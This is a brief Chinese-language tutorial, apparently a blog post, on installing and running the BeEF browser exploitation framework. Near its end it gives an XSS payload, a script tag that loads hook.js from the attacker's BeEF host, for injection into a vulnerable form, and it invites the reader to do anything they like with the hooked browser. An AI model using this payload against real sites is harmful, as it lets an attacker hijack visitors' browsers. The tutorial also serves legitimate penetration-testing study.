首页 网络安全

BeEF,全称The Browser Exploitation Framework,是一款针对浏览器的渗透测试工具。

下载beef
https://github.com/beefproject/beef

解压进入beef-master
2020-11-09_20-47.png
输入bundle install进行安装

安装完成后需要打开config.yaml修改帐号密码
2020-11-09_20-47_1.png
修改密码之后启动beef

./beef

在浏览器内输入命令行界面的http://本机ip:3000/ui/authentication访问,在beef登录界面输入beef的用户名和密码登录beef界面


登录后,将<script src='http://IP(运行beef主机的IP):3000/hook.js'></script>插入存在xss漏洞的表单中,然后访问被上马的网页。如图
2020-11-09_20-44.png

回到Manjaro,出现了被攻击的机子,这时你就可以用Commands模块的功能为所欲为了。




文章评论

目录